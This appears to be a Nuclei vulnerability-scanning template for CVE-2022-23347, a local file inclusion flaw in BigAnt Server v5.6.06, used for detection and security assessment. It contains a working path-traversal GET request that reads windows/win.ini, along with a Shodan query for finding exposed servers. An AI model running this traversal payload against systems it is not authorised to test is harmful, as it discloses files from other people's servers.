42 lines
1.0 KiB
YAML
42 lines
1.0 KiB
YAML
id: CVE-2022-23347
|
|
|
|
info:
|
|
name: BigAnt Server v5.6.06 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-23347
|
|
- http://bigant.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-23347
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
shodan-query: http.html:"BigAnt"
|
|
verified: "true"
|
|
tags: cve,cve2022,bigant,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/29
|